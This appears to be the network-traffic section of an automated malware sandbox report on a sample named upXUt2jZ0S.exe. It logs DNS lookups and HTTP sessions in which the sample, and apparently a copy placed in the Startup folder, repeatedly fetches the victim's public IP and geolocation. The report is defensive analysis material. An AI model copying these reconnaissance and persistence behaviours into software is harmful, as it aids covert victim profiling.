                                                                      Jan 10, 2025 21:56:14.503804922 CET6078453192.168.2.9162.159.36.2
                                                                      Jan 10, 2025 21:56:14.508886099 CET5360784162.159.36.2192.168.2.9
                                                                      Jan 10, 2025 21:56:14.508941889 CET6078453192.168.2.9162.159.36.2
                                                                      Jan 10, 2025 21:56:29.792005062 CET4986380192.168.2.9132.226.247.73
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jan 10, 2025 21:55:46.940901041 CET4947053192.168.2.91.1.1.1
                                                                      Jan 10, 2025 21:55:46.947477102 CET53494701.1.1.1192.168.2.9
                                                                      Jan 10, 2025 21:55:49.941523075 CET4993453192.168.2.91.1.1.1
                                                                      Jan 10, 2025 21:55:49.948889971 CET53499341.1.1.1192.168.2.9
                                                                      Jan 10, 2025 21:56:13.963356018 CET5360020162.159.36.2192.168.2.9
                                                                      Jan 10, 2025 21:56:14.552771091 CET6312553192.168.2.91.1.1.1
                                                                      Jan 10, 2025 21:56:14.559752941 CET53631251.1.1.1192.168.2.9
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Jan 10, 2025 21:55:46.940901041 CET192.168.2.91.1.1.10x5373Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                      Jan 10, 2025 21:55:49.941523075 CET192.168.2.91.1.1.10xfaf0Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                      Jan 10, 2025 21:56:14.552771091 CET192.168.2.91.1.1.10xfec7Standard query (0)15.164.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Jan 10, 2025 21:55:40.635499954 CET1.1.1.1192.168.2.90xeff0No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 10, 2025 21:55:40.635499954 CET1.1.1.1192.168.2.90xeff0No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                      Jan 10, 2025 21:55:46.947477102 CET1.1.1.1192.168.2.90x5373No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 10, 2025 21:55:46.947477102 CET1.1.1.1192.168.2.90x5373No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                      Jan 10, 2025 21:55:46.947477102 CET1.1.1.1192.168.2.90x5373No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                      Jan 10, 2025 21:55:46.947477102 CET1.1.1.1192.168.2.90x5373No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                      Jan 10, 2025 21:55:46.947477102 CET1.1.1.1192.168.2.90x5373No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                      Jan 10, 2025 21:55:46.947477102 CET1.1.1.1192.168.2.90x5373No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                      Jan 10, 2025 21:55:49.948889971 CET1.1.1.1192.168.2.90xfaf0No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                      Jan 10, 2025 21:55:49.948889971 CET1.1.1.1192.168.2.90xfaf0No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                      Jan 10, 2025 21:55:49.948889971 CET1.1.1.1192.168.2.90xfaf0No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                      Jan 10, 2025 21:55:49.948889971 CET1.1.1.1192.168.2.90xfaf0No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                      Jan 10, 2025 21:55:49.948889971 CET1.1.1.1192.168.2.90xfaf0No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                      Jan 10, 2025 21:55:49.948889971 CET1.1.1.1192.168.2.90xfaf0No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                      Jan 10, 2025 21:55:49.948889971 CET1.1.1.1192.168.2.90xfaf0No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                      Jan 10, 2025 21:56:14.559752941 CET1.1.1.1192.168.2.90xfec7Name error (3)15.164.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                      • reallyfreegeoip.org
                                                                      • checkip.dyndns.org
                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.949738132.226.247.73801184C:\Users\user\Desktop\upXUt2jZ0S.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 10, 2025 21:55:46.959542990 CET151OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Connection: Keep-Alive
                                                                      Jan 10, 2025 21:55:47.631844997 CET273INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 20:55:47 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                      Jan 10, 2025 21:55:47.661509037 CET127OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Jan 10, 2025 21:55:49.870723009 CET273INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 20:55:49 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                      Jan 10, 2025 21:55:50.745974064 CET127OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Jan 10, 2025 21:55:53.953176975 CET697INHTTP/1.1 504 Gateway Time-out
                                                                      Date: Fri, 10 Jan 2025 20:55:53 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 557
                                                                      Connection: keep-alive
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                      Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                      Jan 10, 2025 21:55:54.120001078 CET127OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Jan 10, 2025 21:55:54.335509062 CET273INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 20:55:54 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.949799132.226.247.73801184C:\Users\user\Desktop\upXUt2jZ0S.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 10, 2025 21:55:54.955499887 CET127OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Jan 10, 2025 21:55:56.625652075 CET273INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 20:55:56 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.949813132.226.247.73801184C:\Users\user\Desktop\upXUt2jZ0S.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 10, 2025 21:55:57.271898031 CET151OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Connection: Keep-Alive
                                                                      Jan 10, 2025 21:55:58.978566885 CET273INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 20:55:58 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.949831132.226.247.73801184C:\Users\user\Desktop\upXUt2jZ0S.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 10, 2025 21:55:59.626461029 CET151OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Connection: Keep-Alive
                                                                      Jan 10, 2025 21:56:00.336684942 CET273INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 20:56:00 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.949842132.226.247.73801184C:\Users\user\Desktop\upXUt2jZ0S.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 10, 2025 21:56:00.957765102 CET151OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Connection: Keep-Alive
                                                                      Jan 10, 2025 21:56:01.651186943 CET273INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 20:56:01 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.949851132.226.247.73801184C:\Users\user\Desktop\upXUt2jZ0S.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 10, 2025 21:56:02.296025038 CET151OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Connection: Keep-Alive
                                                                      Jan 10, 2025 21:56:02.974539042 CET273INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 20:56:02 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.949863132.226.247.73807624C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 10, 2025 21:56:03.916841030 CET151OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Connection: Keep-Alive
                                                                      Jan 10, 2025 21:56:07.623919964 CET697INHTTP/1.1 504 Gateway Time-out
                                                                      Date: Fri, 10 Jan 2025 20:56:07 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 557
                                                                      Connection: keep-alive
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                      Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.949761104.21.48.14431184C:\Users\user\Desktop\upXUt2jZ0S.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-10 20:55:50 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      Connection: Keep-Alive
                                                                      2025-01-10 20:55:50 UTC853INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 20:55:50 GMT
                                                                      Content-Type: text/xml
                                                                      Content-Length: 362
                                                                      Connection: close
                                                                      Age: 1857339
                                                                      Cache-Control: max-age=31536000
                                                                      cf-cache-status: HIT
                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I5UgRqf1EhDUiblk91kv1BvZHaiOJrHWv9aoQlAtU0oa27U5EaZLMCOph3SoFAiAAYCeu2T8XnImPOECvNV3ZjA8DXsK9E9lwHChd7SIq1%2FaX5C1jfJORlfQoXcNf%2FL6pXv0QE0W"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fff91fd7e788c15-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1809&min_rtt=1799&rtt_var=695&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1550716&cwnd=238&unsent_bytes=0&cid=29656c5879610b25&ts=257&x=0"
                                                                      2025-01-10 20:55:50 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.949794104.21.48.14431184C:\Users\user\Desktop\upXUt2jZ0S.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-10 20:55:54 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      2025-01-10 20:55:54 UTC863INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 20:55:54 GMT
                                                                      Content-Type: text/xml
                                                                      Content-Length: 362
                                                                      Connection: close
                                                                      Age: 1857344
                                                                      Cache-Control: max-age=31536000
                                                                      cf-cache-status: HIT
                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=afzH3wZcrSOtMb8Uv%2FXiPqDxCv%2BSWHGv7TMjckv%2FxvK1vwCfvo3T7Rj5EWayUEGzImDt2UucCyv%2B12ZO%2FQUZpjDfb95zG51fSj1wnfTP6JioHAIatGKvHS%2FX%2Ffgu6XRbbO6y5uns"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fff92180bc9c461-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1594&min_rtt=1588&rtt_var=608&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1781574&cwnd=228&unsent_bytes=0&cid=f96b5d6171dda926&ts=143&x=0"
                                                                      2025-01-10 20:55:54 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.949807104.21.48.14431184C:\Users\user\Desktop\upXUt2jZ0S.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-10 20:55:57 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      Connection: Keep-Alive
                                                                      2025-01-10 20:55:57 UTC857INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 20:55:57 GMT
                                                                      Content-Type: text/xml
                                                                      Content-Length: 362
                                                                      Connection: close
                                                                      Age: 1857346
                                                                      Cache-Control: max-age=31536000
                                                                      cf-cache-status: HIT
                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3FASVDjoFjbWXgAgl4XbulYhcukPlvyW%2B97QXfBAjYpQ5qYG%2Fsgl8xOK7PSHlOwVEOibQ056f8wqTWLRYBYALGR6b3PgA4yYLv9cHXhZl2MIIhbrfY3%2BQu%2B1HwdEy7remgJgKYxN"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fff92267f0342e9-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1632&rtt_var=637&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1684939&cwnd=240&unsent_bytes=0&cid=3796a1b27ebb5027&ts=155&x=0"
